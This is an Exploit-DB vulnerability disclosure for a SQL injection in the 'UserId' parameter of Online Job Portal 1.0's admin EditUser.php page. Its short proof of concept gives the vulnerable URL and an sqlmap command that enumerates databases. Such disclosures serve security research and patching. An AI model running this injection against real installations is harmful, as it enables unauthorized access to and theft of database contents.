Online Job Portal 1.0 - 'userid' SQL Injection

EDB-ID:

48976

CVE:

N/A




Platform:

PHP

Date:

2020-10-30


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

# Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection
# Google Dork: N/A
# Date: 2020/10/28
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP 
# CVE : N/A

# Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId='

Proof of Concept:

1. See vulnerable url.

2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.